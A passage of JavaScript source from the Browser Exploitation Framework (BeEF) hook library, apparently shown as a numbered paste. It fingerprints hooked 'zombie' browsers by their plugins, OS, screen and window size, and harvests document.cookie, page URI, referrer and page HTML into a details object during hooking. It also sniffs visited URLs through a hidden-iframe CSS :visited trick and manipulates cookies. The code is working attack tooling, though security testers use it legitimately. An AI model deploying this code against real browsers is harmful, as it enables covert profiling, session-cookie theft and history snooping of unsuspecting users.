  3363. * @example: if ( beef.browser.hasQuickTime() ) { ... }
  3364. */
  3365. hasQuickTime:function () {
  3366.  
  3367. var quicktime = false;
  3368.  
  3369. // Not Internet Explorer
  3370. if (!this.type().IE) {
  3371.  
  3372. for (i = 0; i < navigator.plugins.length; i++) {
  3373.  
  3374. if (navigator.plugins[i].name.indexOf("QuickTime") >= 0) {
  3375. quicktime = true;
  3376. }
  3377.  
  3378. }
  3379.  
  3380. // Internet Explorer
  3381. } else {
  3382.  
  3383. try {
  3384.  
  3385. var qt_test = new ActiveXObject('QuickTime.QuickTime');
  3386.  
  3387. } catch (e) {
  3388. beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
  3389. }
  3390.  
  3391. if (qt_test) {
  3392. quicktime = true;
  3393. }
  3394.  
  3395. }
  3396.  
  3397. return quicktime;
  3398.  
  3399. },
  3400.  
  3401. /**
  3402. * Checks if the zombie has the RealPlayer plugin installed.
  3403. * @return: {Boolean} true or false.
  3404. *
  3405. * @example: if ( beef.browser.hasRealPlayer() ) { ... }
  3406. */
  3407. hasRealPlayer:function () {
  3408.  
  3409. var realplayer = false;
  3410.  
  3411. // Not Internet Explorer
  3412. if (!this.type().IE) {
  3413.  
  3414. for (i = 0; i < navigator.plugins.length; i++) {
  3415.  
  3416. if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) {
  3417. realplayer = true;
  3418. }
  3419.  
  3420. }
  3421.  
  3422. // Internet Explorer
  3423. } else {
  3424.  
  3425. var definedControls = [
  3426. 'RealPlayer',
  3427. 'rmocx.RealPlayer G2 Control',
  3428. 'rmocx.RealPlayer G2 Control.1',
  3429. 'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
  3430. 'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
  3431. ];
  3432.  
  3433. for (var i = 0; i < definedControls.length; i++) {
  3434.  
  3435. try {
  3436. var rp_test = new ActiveXObject(definedControls[i]);
  3437. } catch (e) {
  3438. beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
  3439. }
  3440.  
  3441. if ( rp_test ) {
  3442. realplayer = true;
  3443.  
  3444. }
  3445. }
  3446. }
  3447.  
  3448. return realplayer;
  3449.  
  3450. },
  3451.  
  3452. /**
  3453. * Checks if the zombie has the Windows Media Player plugin installed.
  3454. * @return: {Boolean} true or false.
  3455. *
  3456. * @example: if ( beef.browser.hasWMP() ) { ... }
  3457. */
  3458. hasWMP:function () {
  3459.  
  3460. var wmp = false;
  3461.  
  3462. // Not Internet Explorer
  3463. if (!this.type().IE) {
  3464.  
  3465. for (i = 0; i < navigator.plugins.length; i++) {
  3466.  
  3467. if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) {
  3468. wmp = true;
  3469. }
  3470.  
  3471. }
  3472.  
  3473. // Internet Explorer
  3474. } else {
  3475.  
  3476. try {
  3477.  
  3478. var wmp_test = new ActiveXObject('WMPlayer.OCX');
  3479.  
  3480. } catch (e) {
  3481. beef.debug("Creating WMP ActiveX object failed: "+e.message);
  3482. }
  3483.  
  3484. if (wmp_test) {
  3485. wmp = true;
  3486. }
  3487.  
  3488. }
  3489.  
  3490. return wmp;
  3491.  
  3492. },
  3493.  
  3494. /**
  3495. * Checks if VLC is installed
  3496. * @return: {Boolean} true or false
  3497. **/
  3498. hasVLC:function() {
  3499. var vlc = false ;
  3500. if(!this.type().IE) {
  3501. for (i = 0; i < navigator.plugins.length; i++) {
  3502. if (navigator.plugins[i].name.indexOf("VLC") >= 0) {
  3503. vlc = true;
  3504. }
  3505. }
  3506. } else {
  3507. try {
  3508. control = new ActiveXObject("VideoLAN.VLCPlugin.2");
  3509. vlc = true ;
  3510. } catch(e) {
  3511. beef.debug("Creating VLC ActiveX object failed: "+e.message);
  3512. }
  3513. }
  3514. return vlc;
  3515. },
  3516.  
  3517. /**
  3518. * Checks if the zombie has Java enabled.
  3519. * @return: {Boolean} true or false.
  3520. *
  3521. * @example: if(beef.browser.javaEnabled()) { ... }
  3522. */
  3523. javaEnabled:function () {
  3524. //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
  3525. // versionJRE = deployJava.getJREs();
  3526.  
  3527. // if(versionJRE != '')
  3528. // return true;
  3529. // else
  3530. return false;
  3531.  
  3532. },
  3533.  
  3534. /**
  3535. * Checks if the Phonegap API is available from the hooked domain.
  3536. * @return: {Boolean} true or false.
  3537. *
  3538. * @example: if(beef.browser.hasPhonegap()) { ... }
  3539. */
  3540. hasPhonegap:function () {
  3541. var result = false;
  3542.  
  3543. try {
  3544. if (!!device.phonegap || !!device.cordova) result = true; else result = false;
  3545. }
  3546. catch (e) {
  3547. result = false;
  3548. }
  3549. return result;
  3550. },
  3551.  
  3552. /**
  3553. * Checks if the browser supports CORS
  3554. * @return: {Boolean} true or false.
  3555. *
  3556. * @example: if(beef.browser.hasCors()) { ... }
  3557. */
  3558. hasCors:function () {
  3559. if ('withCredentials' in new XMLHttpRequest())
  3560. return true;
  3561. else if (typeof XDomainRequest !== "undefined")
  3562. return true;
  3563. else
  3564. return false;
  3565. },
  3566.  
  3567. /**
  3568. * Checks if the zombie has Java installed and enabled.
  3569. * @return: {Boolean} true or false.
  3570. *
  3571. * @example: if(beef.browser.hasJava()) { ... }
  3572. */
  3573. hasJava:function () {
  3574.  
  3575. return beef.browser.javaEnabled();
  3576.  
  3577. },
  3578.  
  3579. /**
  3580. * Checks if the zombie has VBScript enabled.
  3581. * @return: {Boolean} true or false.
  3582. *
  3583. * @example: if(beef.browser.hasVBScript()) { ... }
  3584. */
  3585. hasVBScript:function () {
  3586. if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) {
  3587. return true;
  3588. } else {
  3589. return false;
  3590. }
  3591. },
  3592.  
  3593. /**
  3594. * Returns the list of plugins installed in the browser.
  3595. */
  3596. getPlugins:function () {
  3597.  
  3598. var results;
  3599. Array.prototype.unique = function () {
  3600. var o = {}, i, l = this.length, r = [];
  3601. for (i = 0; i < l; i += 1) o[this[i]] = this[i];
  3602. for (i in o) r.push(o[i]);
  3603. return r;
  3604. };
  3605.  
  3606. // Internet Explorer
  3607. if (this.isIE()) this.getPluginsIE();
  3608.  
  3609. // All other browsers that support navigator.plugins
  3610. else if (navigator.plugins && navigator.plugins.length > 0) {
  3611. results = new Array();
  3612. for (var i = 0; i < navigator.plugins.length; i++) {
  3613.  
  3614. // Firefox returns exact plugin versions
  3615. if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
  3616.  
  3617. // Webkit and Presto (Opera)
  3618. // Don't support the version attribute
  3619. // Sometimes store the version in description (Real, Adobe)
  3620. else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
  3621. }
  3622. results = results.unique().toString();
  3623.  
  3624. // All browsers that don't support navigator.plugins
  3625. } else {
  3626. results = new Array();
  3627. //firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726
  3628. // On linux sistem the "version" slot is empty so I'll attach "description" after version
  3629. var plugins = {
  3630.  
  3631. 'AdobeAcrobat':{
  3632. 'control':'Adobe Acrobat',
  3633. 'return':function (control) {
  3634. try {
  3635. version = navigator.plugins["Adobe Acrobat"]["description"];
  3636. return 'Adobe Acrobat Version ' + version; //+ " description "+ filename;
  3637.  
  3638. }
  3639. catch (e) {
  3640. }
  3641.  
  3642.  
  3643. }},
  3644. 'Flash':{
  3645. 'control':'Shockwave Flash',
  3646. 'return':function (control) {
  3647. try {
  3648. version = navigator.plugins["Shockwave Flash"]["description"];
  3649. return 'Flash Player Version ' + version; //+ " description "+ filename;
  3650. }
  3651.  
  3652. catch (e) {
  3653. }
  3654. }},
  3655. 'Google_Talk_Plugin_Accelerator':{
  3656. 'control':'Google Talk Plugin Video Accelerator',
  3657. 'return':function (control) {
  3658.  
  3659. try {
  3660. version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"];
  3661. return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename;
  3662. }
  3663. catch (e) {
  3664. }
  3665. }},
  3666. 'Google_Talk_Plugin':{
  3667. 'control':'Google Talk Plugin',
  3668. 'return':function (control) {
  3669. try {
  3670. version = navigator.plugins['Google Talk Plugin']["description"];
  3671. return 'Google Talk Plugin Version ' + version;// " description "+ filename;
  3672. }
  3673. catch (e) {
  3674. }
  3675. }},
  3676. 'Facebook_Video_Calling_Plugin':{
  3677. 'control':'Facebook Video Calling Plugin',
  3678. 'return':function (control) {
  3679. try {
  3680. version = navigator.plugins["Facebook Video Calling Plugin"]["description"];
  3681. return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename;
  3682. }
  3683. catch (e) {
  3684. }
  3685. }},
  3686. 'Google_Update':{
  3687. 'control':'Google Update',
  3688. 'return':function (control) {
  3689. try {
  3690. version = navigator.plugins["Google Update"]["description"];
  3691. return 'Google Update Version ' + version//+ " description "+ filename;
  3692. }
  3693. catch (e) {
  3694. }
  3695. }},
  3696. 'Windows_Activation_Technologies':{
  3697. 'control':'Windows Activation Technologies',
  3698. 'return':function (control) {
  3699. try {
  3700. version = navigator.plugins["Windows Activation Technologies"]["description"];
  3701. return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename;
  3702. }
  3703. catch (e) {
  3704. }
  3705.  
  3706. }},
  3707. 'VLC_Web_Plugin':{
  3708. 'control':'VLC Web Plugin',
  3709. 'return':function (control) {
  3710. try {
  3711. version = navigator.plugins["VLC Web Plugin"]["description"];
  3712. return 'VLC Web Plugin Version ' + version;//+ " description "+ filename;
  3713. }
  3714. catch (e) {
  3715. }
  3716. }},
  3717. 'Google_Earth_Plugin':{
  3718. 'control':'Google Earth Plugin',
  3719.  
  3720. 'return':function (control) {
  3721. try {
  3722. version = navigator.plugins['Google Earth Plugin']["description"];
  3723. return 'Google Earth Plugin Version ' + version;//+ " description "+ filename;
  3724. }
  3725. catch (e) {
  3726. }
  3727. }},
  3728. 'Silverlight_Plug-In':{
  3729. 'control':'Silverlight Plug-In',
  3730. 'return':function (control) {
  3731. try {
  3732. version = navigator.plugins['Silverlight Plug-In']["description"];
  3733. return 'Silverlight Plug-In Version ' + version;//+ " description "+ filename;
  3734. }
  3735. catch (e) {
  3736. }
  3737. }},
  3738. 'FoxitReader_Plugin':{
  3739. 'control':'FoxitReader Plugin',
  3740. 'return':function (control) {
  3741. try {
  3742. version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version'];
  3743. return 'FoxitReader Plugin Version ' + version;
  3744. } catch (e) {
  3745. }
  3746. }}
  3747. };
  3748.  
  3749. var c = 0;
  3750. for (var i in plugins) {
  3751. //each element od plugins
  3752. var control = plugins[i]['control'];
  3753. try {
  3754. var version = plugins[i]['return'](control);
  3755. if (version) {
  3756. results[c] = version;
  3757. c = c + 1;
  3758. }
  3759. }
  3760. catch (e) {
  3761. }
  3762.  
  3763. }
  3764. }
  3765. // Return results
  3766. return results;
  3767. },
  3768.  
  3769. /**
  3770. * Returns a list of plugins detected by IE. This is a hack because IE doesn't
  3771. * support navigator.plugins
  3772. */
  3773. getPluginsIE:function () {
  3774. var results = '';
  3775. var plugins = {'AdobePDF6':{
  3776. 'control':'PDF.PdfCtrl',
  3777. 'return':function (control) {
  3778. version = control.getVersions().split(',');
  3779. version = version[0].split('=');
  3780. return 'Acrobat Reader v' + parseFloat(version[1]);
  3781. }},
  3782. 'AdobePDF7':{
  3783. 'control':'AcroPDF.PDF',
  3784. 'return':function (control) {
  3785. version = control.getVersions().split(',');
  3786. version = version[0].split('=');
  3787. return 'Acrobat Reader v' + parseFloat(version[1]);
  3788. }},
  3789. 'Flash':{
  3790. 'control':'ShockwaveFlash.ShockwaveFlash',
  3791. 'return':function (control) {
  3792. version = control.getVariable('$version').substring(4);
  3793. return 'Flash Player v' + version.replace(/,/g, ".");
  3794. }},
  3795. 'Quicktime':{
  3796. 'control':'QuickTime.QuickTime',
  3797. 'return':function (control) {
  3798. return 'QuickTime Player';
  3799. }},
  3800. 'RealPlayer':{
  3801. 'control':'RealPlayer',
  3802. 'return':function (control) {
  3803. version = control.getVersionInfo();
  3804. return 'RealPlayer v' + parseFloat(version);
  3805. }},
  3806. 'Shockwave':{
  3807. 'control':'SWCtl.SWCtl',
  3808. 'return':function (control) {
  3809. version = control.ShockwaveVersion('').split('r');
  3810. return 'Shockwave v' + parseFloat(version[0]);
  3811. }},
  3812. 'WindowsMediaPlayer':{
  3813. 'control':'WMPlayer.OCX',
  3814. 'return':function (control) {
  3815. return 'Windows Media Player v' + parseFloat(control.versionInfo);
  3816. }},
  3817. 'FoxitReaderPlugin':{
  3818. 'control':'FoxitReader.FoxitReaderCtl.1',
  3819. 'return':function (control) {
  3820. return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo);
  3821. }}
  3822. };
  3823. if (window.ActiveXObject) {
  3824. var j = 0;
  3825. for (var i in plugins) {
  3826. var control = null;
  3827. var version = null;
  3828. try {
  3829. control = new ActiveXObject(plugins[i]['control']);
  3830. } catch (e) {
  3831. }
  3832. if (control) {
  3833. if (j != 0)
  3834. results += ', ';
  3835. results += plugins[i]['return'](control);
  3836. j++;
  3837. }
  3838. }
  3839. }
  3840. return results;
  3841. },
  3842.  
  3843. /**
  3844. * Returns zombie screen size and color depth.
  3845. */
  3846. getScreenSize:function () {
  3847. return {
  3848. width:window.screen.width,
  3849. height:window.screen.height,
  3850. colordepth:window.screen.colorDepth
  3851. }
  3852. },
  3853.  
  3854. /**
  3855. * Returns zombie browser window size.
  3856. * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
  3857. */
  3858. getWindowSize:function () {
  3859. var myWidth = 0, myHeight = 0;
  3860. if (typeof( window.innerWidth ) == 'number') {
  3861. // Non-IE
  3862. myWidth = window.innerWidth;
  3863. myHeight = window.innerHeight;
  3864. } else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) {
  3865. // IE 6+ in 'standards compliant mode'
  3866. myWidth = document.documentElement.clientWidth;
  3867. myHeight = document.documentElement.clientHeight;
  3868. } else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) {
  3869. // IE 4 compatible
  3870. myWidth = document.body.clientWidth;
  3871. myHeight = document.body.clientHeight;
  3872. }
  3873. return {
  3874. width:myWidth,
  3875. height:myHeight
  3876. }
  3877. },
  3878.  
  3879. /**
  3880. * Construct hash from browser details. This function is used to grab the browser details during the hooking process
  3881. */
  3882. getDetails:function () {
  3883. var details = new Array();
  3884.  
  3885. var browser_name = beef.browser.getBrowserName();
  3886. var browser_version = beef.browser.getBrowserVersion();
  3887. var browser_reported_name = beef.browser.getBrowserReportedName();
  3888. var page_title = (document.title) ? document.title : "Unknown";
  3889. var page_uri = (document.location.href) ? document.location.href : "Unknown";
  3890. var page_referrer = (document.referrer) ? document.referrer : "Unknown";
  3891. var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
  3892. var hostport = (document.location.port) ? document.location.port : "80";
  3893. var browser_plugins = beef.browser.getPlugins();
  3894. var date_stamp = new Date().toString();
  3895. var os_name = beef.os.getName();
  3896. var hw_name = beef.hardware.getName();
  3897. var cpu_type = beef.hardware.cpuType();
  3898. var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
  3899. var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
  3900. var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
  3901. if (value == true) return value; else if (typeof value == 'object') return value; else return;
  3902. });
  3903. var screen_size = beef.browser.getScreenSize();
  3904. var window_size = beef.browser.getWindowSize();
  3905. var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
  3906. var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
  3907. var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
  3908. var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
  3909. var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
  3910. var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
  3911. var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
  3912. var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
  3913. var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
  3914. var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
  3915. var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
  3916. var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
  3917. try{
  3918. var cookies = document.cookie;
  3919. var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
  3920. var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
  3921. if (cookies) details['Cookies'] = cookies;
  3922. if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
  3923. if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
  3924. }catch(e){
  3925. // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
  3926. // and there is no reason to read cookies at this point
  3927. details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
  3928. details['hasSessionCookies'] = "No";
  3929. details['hasPersistentCookies'] = "No";
  3930. }
  3931.  
  3932. if (browser_name) details['BrowserName'] = browser_name;
  3933. if (browser_version) details['BrowserVersion'] = browser_version;
  3934. if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
  3935. if (page_title) details['PageTitle'] = page_title;
  3936. if (page_uri) details['PageURI'] = page_uri;
  3937. if (page_referrer) details['PageReferrer'] = page_referrer;
  3938. if (hostname) details['HostName'] = hostname;
  3939. if (hostport) details['HostPort'] = hostport;
  3940. if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
  3941. if (os_name) details['OsName'] = os_name;
  3942. if (hw_name) details['Hardware'] = hw_name;
  3943. if (cpu_type) details['CPU'] = cpu_type;
  3944. if (touch_enabled) details['TouchEnabled'] = touch_enabled;
  3945. if (date_stamp) details['DateStamp'] = date_stamp;
  3946. if (browser_platform) details['BrowserPlatform'] = browser_platform;
  3947. if (browser_type) details['BrowserType'] = browser_type;
  3948. if (screen_size) details['ScreenSize'] = screen_size;
  3949. if (window_size) details['WindowSize'] = window_size;
  3950. if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
  3951. if (has_flash) details['HasFlash'] = has_flash;
  3952. if (has_phonegap) details['HasPhonegap'] = has_phonegap;
  3953. if (has_web_socket) details['HasWebSocket'] = has_web_socket;
  3954. if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
  3955. if (has_webrtc) details['HasWebRTC'] = has_webrtc;
  3956. if (has_activex) details['HasActiveX'] = has_activex;
  3957. if (has_silverlight) details['HasSilverlight'] = has_silverlight;
  3958. if (has_quicktime) details['HasQuickTime'] = has_quicktime;
  3959. if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
  3960. if (has_wmp) details['HasWMP'] = has_wmp;
  3961. if (has_foxit) details['HasFoxit'] = has_foxit;
  3962.  
  3963. return details;
  3964. },
  3965.  
  3966. /**
  3967. * Returns boolean value depending on whether the browser supports ActiveX
  3968. */
  3969. hasActiveX:function () {
  3970. return !!window.ActiveXObject;
  3971. },
  3972.  
  3973. /**
  3974. * Returns boolean value depending on whether the browser supports WebRTC
  3975. */
  3976. hasWebRTC:function () {
  3977. return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
  3978. },
  3979.  
  3980. /**
  3981. * Returns boolean value depending on whether the browser supports Silverlight
  3982. */
  3983. hasSilverlight:function () {
  3984. var result = false;
  3985.  
  3986. try {
  3987. if (beef.browser.isIE()) {
  3988. var slControl = new ActiveXObject('AgControl.AgControl');
  3989. result = true;
  3990. } else if (navigator.plugins["Silverlight Plug-In"]) {
  3991. result = true;
  3992. }
  3993. } catch (e) {
  3994. result = false;
  3995. }
  3996.  
  3997. return result;
  3998. },
  3999.  
  4000. /**
  4001. * Returns array of results, whether or not the target zombie has visited the specified URL
  4002. */
  4003. hasVisited:function (urls) {
  4004. var results = new Array();
  4005. var iframe = beef.dom.createInvisibleIframe();
  4006. var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document;
  4007. ifdoc.open();
  4008. ifdoc.write('<style>a:visited{width:0px !important;}</style>');
  4009. ifdoc.close();
  4010. urls = urls.split("\n");
  4011. var count = 0;
  4012. for (var i in urls) {
  4013. var u = urls[i];
  4014. if (u != "" || u != null) {
  4015. var success = false;
  4016. var a = ifdoc.createElement('a');
  4017. a.href = u;
  4018. ifdoc.body.appendChild(a);
  4019. var width = null;
  4020. (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
  4021. if (width == '0px') {
  4022. success = true;
  4023. }
  4024. results.push({'url':u, 'visited':success});
  4025. count++;
  4026. }
  4027. }
  4028. beef.dom.removeElement(iframe);
  4029. if (results.length == 0) {
  4030. return false;
  4031. }
  4032. return results;
  4033. },
  4034.  
  4035. /**
  4036. * Checks if the zombie has Web Sockets enabled.
  4037. * @return: {Boolean} true or false.
  4038. * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
  4039. * */
  4040. hasWebSocket:function () {
  4041. return !!window.WebSocket || !!window.MozWebSocket;
  4042. },
  4043.  
  4044. /**
  4045. * Checks if the zombie has Google Gears installed.
  4046. * @return: {Boolean} true or false.
  4047. *
  4048. * @from: https://code.google.com/apis/gears/gears_init.js
  4049. * */
  4050. hasGoogleGears:function () {
  4051.  
  4052. var ggfactory = null;
  4053.  
  4054. // Chrome
  4055. if (window.google && google.gears) return true;
  4056.  
  4057. // Firefox
  4058. if (typeof GearsFactory != 'undefined') {
  4059. ggfactory = new GearsFactory();
  4060. } else {
  4061. // IE
  4062. try {
  4063. ggfactory = new ActiveXObject('Gears.Factory');
  4064. // IE Mobile on WinCE.
  4065. if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) {
  4066. ggfactory.privateSetGlobalObject(this);
  4067. }
  4068. } catch (e) {
  4069. // Safari
  4070. if ((typeof navigator.mimeTypes != 'undefined')
  4071. && navigator.mimeTypes["application/x-googlegears"]) {
  4072. ggfactory = document.createElement("object");
  4073. ggfactory.style.display = "none";
  4074. ggfactory.width = 0;
  4075. ggfactory.height = 0;
  4076. ggfactory.type = "application/x-googlegears";
  4077. document.documentElement.appendChild(ggfactory);
  4078. if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null;
  4079. }
  4080. }
  4081. }
  4082. if (!ggfactory) return false; else return true;
  4083. },
  4084.  
  4085. /**
  4086. * Checks if the zombie has Foxit PDF reader plugin.
  4087. * @return: {Boolean} true or false.
  4088. *
  4089. * @example: if(beef.browser.hasFoxit()) { ... }
  4090. * */
  4091. hasFoxit:function () {
  4092.  
  4093. var foxitplugin = false;
  4094.  
  4095. try {
  4096. if (beef.browser.isIE()) {
  4097. var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1');
  4098. foxitplugin = true;
  4099. } else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) {
  4100. foxitplugin = true;
  4101. }
  4102. } catch (e) {
  4103. foxitplugin = false;
  4104. }
  4105.  
  4106. return foxitplugin;
  4107. },
  4108.  
  4109. /**
  4110. * Returns the page head HTML
  4111. **/
  4112. getPageHead:function () {
  4113. var html_head;
  4114. try {
  4115. html_head = document.head.innerHTML.toString();
  4116. } catch (e) {
  4117. }
  4118. return html_head;
  4119. },
  4120.  
  4121. /**
  4122. * Returns the page body HTML
  4123. **/
  4124. getPageBody:function() {
  4125. var html_body;
  4126. try {
  4127. html_body = document.body.innerHTML.toString();
  4128. } catch (e) {
  4129. }
  4130. return html_body;
  4131. },
  4132.  
  4133. /**
  4134. * Dynamically changes the favicon: works in Firefox, Chrome and Opera
  4135. **/
  4136. changeFavicon:function (favicon_url) {
  4137. var iframe = null;
  4138. if (this.isC()) {
  4139. iframe = document.createElement('iframe');
  4140. iframe.src = 'about:blank';
  4141. iframe.style.display = 'none';
  4142. document.body.appendChild(iframe);
  4143. }
  4144. var link = document.createElement('link'),
  4145. oldLink = document.getElementById('dynamic-favicon');
  4146. link.id = 'dynamic-favicon';
  4147. link.rel = 'shortcut icon';
  4148. link.href = favicon_url;
  4149. if (oldLink) document.head.removeChild(oldLink);
  4150. document.head.appendChild(link);
  4151. if (this.isC()) iframe.src += '';
  4152. },
  4153.  
  4154. /**
  4155. * Changes page title
  4156. **/
  4157. changePageTitle:function (title) {
  4158. document.title = title;
  4159. },
  4160.  
  4161. /**
  4162. * A function that gets the max number of simultaneous connections the
  4163. * browser can make per domain, or globally on all domains.
  4164. *
  4165. * This code is based on research from browserspy.dk
  4166. *
  4167. * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
  4168. * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes
  4169. * the number of connections to the callback function as "this"
  4170. *
  4171. * example usage:
  4172. * $j.when(getMaxConnections()).done(function(){
  4173. * console.debug("Max Connections: " + this);
  4174. * });
  4175. *
  4176. */
  4177. getMaxConnections:function (scope) {
  4178.  
  4179. var imagesCount = 30; // Max number of images to test
  4180. var secondsTimeout = 5; // Image load timeout threashold
  4181. var testUrl = ""; // The image testing service URL
  4182.  
  4183. // User broserspy.dk max connections service URL.
  4184. if (scope == 'PER_DOMAIN')
  4185. testUrl = "http://browserspy.dk/connections.php?img=1&amp;random=";
  4186. else
  4187. // The token will be replaced by a different number with each request(different domain).
  4188. testUrl = "http://<token>.browserspy.dk/connections.php?img=1&amp;random=";
  4189.  
  4190.  
  4191. var imagesLoaded = 0; // Number of responding images before timeout.
  4192. var imagesRequested = 0; // Number of requested images.
  4193. var testImages = new Array(); // Array of all images.
  4194. var deferredObject = $j.Deferred(); // A jquery Deferred object.
  4195.  
  4196. for (var i = 1; i <= imagesCount; i++) {
  4197. // Asynchronously request image.
  4198. testImages[i] =
  4199. $j.ajax({
  4200. type:"get",
  4201. dataType:true,
  4202. url:(testUrl.replace("<token>", i)) + Math.random(),
  4203. data:"",
  4204. timeout:(secondsTimeout * 1000),
  4205.  
  4206. // Function on completion of request.
  4207. complete:function (jqXHR, textStatus) {
  4208.  
  4209. imagesRequested++;
  4210.  
  4211. // If the image returns a 200 or a 302, the text Status is "error", else null
  4212. if (textStatus == "error") {
  4213. imagesLoaded++;
  4214. }
  4215.  
  4216. // If all images requested
  4217. if (imagesRequested >= imagesCount) {
  4218. // resolve the deferred object passing the number of loaded images.
  4219. deferredObject.resolveWith(imagesLoaded);
  4220. }
  4221. }
  4222. });
  4223.  
  4224. }
  4225.  
  4226. // Return a promise to resolve the deffered object when the images are loaded.
  4227. return deferredObject.promise();
  4228.  
  4229. }
  4230.  
  4231. };
  4232.  
  4233. beef.regCmp('beef.browser');
  4234.  
  4235.  
  4236. //
  4237. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  4238. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  4239. // See the file 'doc/COPYING' for copying permission
  4240. //
  4241.  
  4242. /*!
  4243. * @literal object: beef.browser.cookie
  4244. *
  4245. * Provides fuctions for working with cookies.
  4246. * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
  4247. * Original author unknown.
  4248. *
  4249. */
  4250. beef.browser.cookie = {
  4251.  
  4252. setCookie: function (name, value, expires, path, domain, secure)
  4253. {
  4254.  
  4255. var today = new Date();
  4256. today.setTime( today.getTime() );
  4257.  
  4258. if ( expires )
  4259. {
  4260. expires = expires * 1000 * 60 * 60 * 24;
  4261. }
  4262. var expires_date = new Date( today.getTime() + (expires) );
  4263.  
  4264. document.cookie = name + "=" +escape( value ) +
  4265. ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
  4266. ( ( path ) ? ";path=" + path : "" ) +
  4267. ( ( domain ) ? ";domain=" + domain : "" ) +
  4268. ( ( secure ) ? ";secure" : "" );
  4269. },
  4270.  
  4271. getCookie: function(name)
  4272. {
  4273. var a_all_cookies = document.cookie.split( ';' );
  4274. var a_temp_cookie = '';
  4275. var cookie_name = '';
  4276. var cookie_value = '';
  4277. var b_cookie_found = false;
  4278.  
  4279. for ( i = 0; i < a_all_cookies.length; i++ )
  4280. {
  4281. a_temp_cookie = a_all_cookies[i].split( '=' );
  4282. cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
  4283. if ( cookie_name == name )
  4284. {
  4285. b_cookie_found = true;
  4286. if ( a_temp_cookie.length > 1 )
  4287. {
  4288. cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
  4289. }
  4290. return cookie_value;
  4291. break;
  4292. }
  4293. a_temp_cookie = null;
  4294. cookie_name = '';
  4295. }
  4296. if ( !b_cookie_found )
  4297. {
  4298. return null;
  4299. }
  4300. },
  4301.  
  4302. deleteCookie: function (name, path, domain)
  4303. {
  4304. if ( this.getCookie(name) ) document.cookie = name + "=" +
  4305. ( ( path ) ? ";path=" + path : "") +
  4306. ( ( domain ) ? ";domain=" + domain : "" ) +
  4307. ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
  4308. },
  4309.  
  4310. hasSessionCookies: function (name)
  4311. {
  4312. var name = name || "cookie";
  4313. if (name == "") name = "cookie";
  4314. this.setCookie( name, 'none', '', '/', '', '' );
  4315.  
  4316. cookiesEnabled = (this.getCookie(name) == null)? false:true;
  4317. this.deleteCookie(name, '/', '');
  4318. return cookiesEnabled;
  4319.  
  4320. },
  4321.  
  4322. hasPersistentCookies: function (name)
  4323. {
  4324. var name = name || "cookie";
  4325. if (name == "") name = "cookie";
  4326. this.setCookie( name, 'none', 1, '/', '', '' );
  4327.  
